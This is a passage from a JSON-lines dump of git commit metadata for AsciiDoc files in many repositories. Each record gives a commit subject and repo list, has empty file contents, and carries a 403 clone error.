2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_file":"_posts\/2016-03-20-Douleurs-extremes-a-latterrissage-en-avion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8920d0615abcb1613d1a451c4c6206bc43161b8c","subject":"Add readme","message":"Add readme\n","repos":"dgengtek\/scripts,dgengtek\/scripts","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dgengtek\/scripts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89243fb9ace8f1ac00b1551c6a8f64fa3da73dd1","subject":"document the changes","message":"document the changes\n","repos":"getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub,getreu\/asciidoctor-fopub","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/getreu\/asciidoctor-fopub.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6776bcb1cc786c069d526ff30f2de766d912eab3","subject":"Testing the asciidoc format on github","message":"Testing the asciidoc format on github\n","repos":"ralt\/lxc-wrapper","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ralt\/lxc-wrapper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1577ccca77a397dd4d3bbb40b2911399246c33d","subject":"build status added on readme.","message":"build status added on readme.\n","repos":"iyzico\/boot-mon,iyzico\/boot-mon","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iyzico\/boot-mon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e783ae2f91a83dee3c82bc3c46d0e60187e0c40","subject":"readme: Explain how to install the dotfiles","message":"readme: Explain how to install the dotfiles\n\nThe most annoying part about having a dotfiles repository is how to\nmanage them. There are several options, from using programs specifically\ndesigned for that purpose to creating your own scripts.\n\nI personally believe that using GNU Stow is the most elegant solution,\nbecause it tends to 'just work' and because it makes you organize your\ndotfiles into topics.\n\nThis section is rather detailed (it includes an example configuration),\nbecause the whole installation *process* should be as painless as\npossible. This means it should not only be easy to install the dotfiles,\nbut just as easy to read *how* to install them.\n","repos":"PigeonF\/.dotfiles","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PigeonF\/.dotfiles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2416b030c60d4c287a7c521dfac5459262773ead","subject":"Cleanup syntax; link to GH repo for emailext","message":"Cleanup syntax; link to GH repo for emailext\n","repos":"jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin","old_file":"FAQ.adoc","new_file":"FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenkinsci\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e231b72135fe9c3e00f3cb6515cb586624d3af","subject":"Add index adoc document","message":"Add index adoc document\n","repos":"globus\/globus-cli,globus\/globus-cli","old_file":"adoc\/index.adoc","new_file":"adoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/globus\/globus-cli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"61345c3b25df7774ed4c80cc76ac725f6b1d5e63","subject":"Update 2014-01-15-More-Than-140.adoc","message":"Update 2014-01-15-More-Than-140.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2014-01-15-More-Than-140.adoc","new_file":"_posts\/2014-01-15-More-Than-140.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbcef72e6c52f2055c7982bbe4423415acd5d69c","subject":"Update 2018-02-26-newton-method.adoc","message":"Update 2018-02-26-newton-method.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-26-newton-method.adoc","new_file":"_posts\/2018-02-26-newton-method.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2666cd571b9b935a9252c47eec9b910af31e347d","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"367771b64c670493d47524385801a6b6e4479d2f","subject":"Replace references to couchbase by mysql","message":"Replace references to couchbase by mysql","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7cb3f241d64e6ef85477bb20a553647a348785a9","subject":"Small commit to hopefully fix build erroring","message":"Small commit to hopefully fix build erroring\n","repos":"oskopek\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,oskopek\/carcv,oskopek\/carcv,sk413025\/carcv,sk413025\/carcv,sk413025\/carcv","old_file":"AUTHORS.adoc","new_file":"AUTHORS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sk413025\/carcv.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d22db91a297627f5421dd6baf5f2dd714ed25c3e","subject":"Update 2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","message":"Update 2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","repos":"TRex22\/blog,TRex22\/blog,TRex22\/blog","old_file":"_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","new_file":"_posts\/2018-09-22-HTT-Prty-JSON-requests-and-the-right-Content-Type.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TRex22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3cf9ffa681f29554fc90f5ea2f78ceb62e28b396","subject":"Publish 2016-7-19-and.adoc","message":"Publish 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f9795b3928b45db16501295c2464bde0ac488ec","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"414d3bba50c89419d7594feba71549a0e2a50ece","subject":"Template and parameters are merged with the rest of the text","message":"Template and parameters are merged with the rest of the text\n\nHighlight them with bold and monospace respectively\n","repos":"dulanov\/emerald-rs","old_file":"docs\/api.adoc","new_file":"docs\/api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5760d1ab52d823803fbb7d7624afede8edcef395","subject":"Some examples have minor mistakes","message":"Some examples have minor mistakes\n\nFix them.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"219922e4d408b06e1d792570b82932ee77750c8a","subject":"y2b create post You Can Make Your Wired Headphones Wireless...","message":"y2b create post You Can Make Your Wired Headphones Wireless...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-28-You-Can-Make-Your-Wired-Headphones-Wireless.adoc","new_file":"_posts\/2017-08-28-You-Can-Make-Your-Wired-Headphones-Wireless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd92357d8f03a04464435be82a98c4c834302ef8","subject":"Update 2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","message":"Update 2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","new_file":"_posts\/2015-07-16-Mapping-DevExpress-controls-from-WinForms-controls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dffcf2c7878330e2a121349c317ba5aff3ec780f","subject":"Publish 2016-6-29-PHPER-RBAC.adoc","message":"Publish 2016-6-29-PHPER-RBAC.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-29-PHPER-RBAC.adoc","new_file":"2016-6-29-PHPER-RBAC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81670a76cb2b175af08c801bd12a261460b25863","subject":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","message":"Update 2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","repos":"silesnet\/silesnet.github.io,silesnet\/silesnet.github.io,silesnet\/silesnet.github.io","old_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_file":"_posts\/2015-04-30-Automaticke-overovani-DHPC-pripojeni.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/silesnet\/silesnet.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3dbc40dac67a0d67acfda2b743e0423b275b1792","subject":"Update 2018-02-13-android-with-google-cloud-vision-api.adoc","message":"Update 2018-02-13-android-with-google-cloud-vision-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_file":"_posts\/2018-02-13-android-with-google-cloud-vision-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"857bcf1e21e0249f64221f6771eabc7c3e707d74","subject":"documentation about cljs-specifics","message":"documentation about cljs-specifics\n","repos":"juxt\/tick,juxt\/tick","old_file":"doc\/cljs.adoc","new_file":"doc\/cljs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juxt\/tick.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdfa83f41e75093a1c7b8652b1da2adb948dab2c","subject":"up with sponsors + links","message":"up with sponsors + links\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9099b2995bf4a2c38abb8b7f3f8c2ed9c9266b6f","subject":"update index.html: remove \"rather old\"","message":"update index.html: remove \"rather old\"\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_index.asciidoc","new_file":"trex_index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2b95421873a04e774c9a0cf8554cc71f804de837","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b98f4dc46247d4dc68996ef930903b39123a2fbf","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6da6c50c0abe0b22d905f8cb49e50a11e09897d","subject":"Added the documentation template.","message":"Added the documentation template.\n","repos":"kurron\/lazybones-experiment,kurron\/lazybones-experiment,kurron\/lazybones-experiment,kurron\/lazybones-experiment","old_file":"templates\/jvm-guy-spring-boot-project\/src\/docs\/asciidoc\/api-guide.asciidoc","new_file":"templates\/jvm-guy-spring-boot-project\/src\/docs\/asciidoc\/api-guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/lazybones-experiment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e13c12cc5bcbc229887a11acd35b8d00d1f48ec4","subject":"y2b create post Samsung Galaxy S4 Hands-on \\u0026 Overview (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Hands-on \\u0026 Overview (Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Handson-u0026-Overview-Galaxy-S-IV.adoc","new_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Handson-u0026-Overview-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e8058bb206b14cf00f7e3088be409d82d8f8652","subject":"Update 2015-06-26-Hello-World.adoc","message":"Update 2015-06-26-Hello-World.adoc","repos":"gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io,gerdbremer\/gerdbremer.github.io","old_file":"_posts\/2015-06-26-Hello-World.adoc","new_file":"_posts\/2015-06-26-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gerdbremer\/gerdbremer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db2aec89e3554f356d41039f53e0a8f874116277","subject":"Update 2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68eb789f644451a3e2e1e90edef12391dffdfb0f","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af385e1295d51c181aa42a1e5b3ec5cb330f10f2","subject":"Update 2017-05-23-Regular-Expression.adoc","message":"Update 2017-05-23-Regular-Expression.adoc","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-23-Regular-Expression.adoc","new_file":"_posts\/2017-05-23-Regular-Expression.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seturne\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f629eb9b96a3034c6cb1334961dcf788e51932d","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4aafbb01dd964f75c5649a6c3d64b66d7267d0d","subject":"Update getting-started.adoc","message":"Update getting-started.adoc","repos":"lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,objectiser\/hawkular.github.io,tsegismont\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,lzoubek\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_file":"src\/main\/jbake\/content\/docs\/user\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ddd212602891f6feabdd6c660a411de7233afd64","subject":"Publish 2016-09-innovation-engineer-aruaru.adoc","message":"Publish 2016-09-innovation-engineer-aruaru.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-09-innovation-engineer-aruaru.adoc","new_file":"2016-09-innovation-engineer-aruaru.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71d146b94027cf4d3f7b2260ce1f9f556b092f94","subject":"Docs: Removed NSFW link.","message":"Docs: Removed NSFW link.\n","repos":"gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,mmaracic\/elasticsearch,elasticdog\/elasticsearch,umeshdangat\/elasticsearch,ZTE-PaaS\/elasticsearch,tebriel\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,girirajsharma\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,scottsom\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,nazarewk\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,markharwood\/elasticsearch,fforbeck\/elasticsearch,girirajsharma\/elasticsearch,jprante\/elasticsearch,Helen-Zhao\/elasticsearch,jimczi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,yynil\/elasticsearch,ricardocerq\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,sreeramjayan\/elasticsearch,nomoa\/elasticsearch,markharwood\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,JackyMai\/elasticsearch,a2lin\/elasticsearch,wenpos\/elasticsearch,mmaracic\/elasticsearch,bawse\/elasticsearch,coding0011\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,s1monw\/elasticsearch,gmarz\/elasticsearch,LeoYao\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,ESamir\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,mmaracic\/elasticsearch,vroyer\/elasticassandra,dongjoon-hyun\/elasticsearch,LeoYao\/elasticsearch,mmaracic\/elasticsearch,ESamir\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,mohit\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,njlawton\/elasticsearch,MaineC\/elasticsearch,episerver\/elasticsearch,palecur\/elasticsearch,episerver\/elasticsearch,njlawton\/elasticsearch,JervyShi\/elasticsearch,JSCooke\/elasticsearch,camilojd\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,wuranbo\/elasticsearch,cwurm\/elasticsearch,ZTE-PaaS\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,vroyer\/elassandra,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,a2lin\/elasticsearch,mjason3\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,clintongormley\/elasticsearch,shreejay\/elasticsearch,MisterAndersen\/elasticsearch,nilabhsagar\/elasticsearch,nazarewk\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,awislowski\/elasticsearch,scorpionvicky\/elasticsearch,kalimatas\/elasticsearch,mikemccand\/elasticsearch,cwurm\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,StefanGor\/elasticsearch,StefanGor\/elasticsearch,rajanm\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,C-Bish\/elasticsearch,spiegela\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,maddin2016\/elasticsearch,cwurm\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,qwerty4030\/elasticsearch,spiegela\/elasticsearch,diendt\/elasticsearch,rlugojr\/elasticsearch,a2lin\/elasticsearch,davidvgalbraith\/elasticsearch,xuzha\/elasticsearch,MisterAndersen\/elasticsearch,wuranbo\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,MisterAndersen\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,palecur\/elasticsearch,markharwood\/elasticsearch,rajanm\/elasticsearch,sreeramjayan\/elasticsearch,nazarewk\/elasticsearch,fernandozhu\/elasticsearch,ricardocerq\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,qwerty4030\/elasticsearch,zkidkid\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,fforbeck\/elasticsearch,scorpionvicky\/elasticsearch,spiegela\/elasticsearch,gmarz\/elasticsearch,StefanGor\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,masaruh\/elasticsearch,markharwood\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,palecur\/elasticsearch,uschindler\/elasticsearch,LeoYao\/elasticsearch,wuranbo\/elasticsearch,maddin2016\/elasticsearch,avikurapati\/elasticsearch,nazarewk\/elasticsearch,yanjunh\/elasticsearch,JSCooke\/elasticsearch,sneivandt\/elasticsearch,JervyShi\/elasticsearch,lks21c\/elasticsearch,jimczi\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,pozhidaevak\/elasticsearch,henakamaMSFT\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra5-rc,liweinan0423\/elasticsearch,dongjoon-hyun\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,palecur\/elasticsearch,diendt\/elasticsearch,diendt\/elasticsearch,uschindler\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,jchampion\/elasticsearch,mapr\/elasticsearch,myelin\/elasticsearch,s1monw\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch,ZTE-PaaS\/elasticsearch,GlenRSmith\/elasticsearch,awislowski\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,gmarz\/elasticsearch,coding0011\/elasticsearch,wenpos\/elasticsearch,camilojd\/elasticsearch,yanjunh\/elasticsearch,dpursehouse\/elasticsearch,masaruh\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,dongjoon-hyun\/elasticsearch,Stacey-Gammon\/elasticsearch,diendt\/elasticsearch,yanjunh\/elasticsearch,artnowo\/elasticsearch,JervyShi\/elasticsearch,yanjunh\/elasticsearch,markharwood\/elasticsearch,mmaracic\/elasticsearch,dpursehouse\/elasticsearch,ricardocerq\/elasticsearch,alexshadow007\/elasticsearch,clintongormley\/elasticsearch,obourgain\/elasticsearch,myelin\/elasticsearch,nezirus\/elasticsearch,episerver\/elasticsearch,dongjoon-hyun\/elasticsearch,girirajsharma\/elasticsearch,Shepard1212\/elasticsearch,girirajsharma\/elasticsearch,liweinan0423\/elasticsearch,wangtuo\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,mapr\/elasticsearch,cwu